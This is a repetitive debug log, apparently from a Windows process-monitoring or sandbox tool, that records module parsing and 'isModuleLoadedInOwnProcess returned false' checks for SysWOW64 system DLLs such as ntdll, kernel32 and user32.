2020-03-24 10:13:48,325 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:48,341 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:48,341 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:48,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:48,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,357 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:48,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,418 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,450 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,466 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,482 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,513 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:48,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:48,528 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,528 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,543 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:48,543 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:48,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:48,559 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:48,559 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:48,559 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:48,575 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:48,575 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:48,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:48,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,591 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,653 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,668 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,684 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,716 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,716 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,716 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,762 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,778 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,793 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,793 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,809 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,839 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,871 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,887 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,903 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,917 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,964 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:48,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,042 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,073 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,198 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:49,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,276 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,308 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:49,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,385 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:49,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
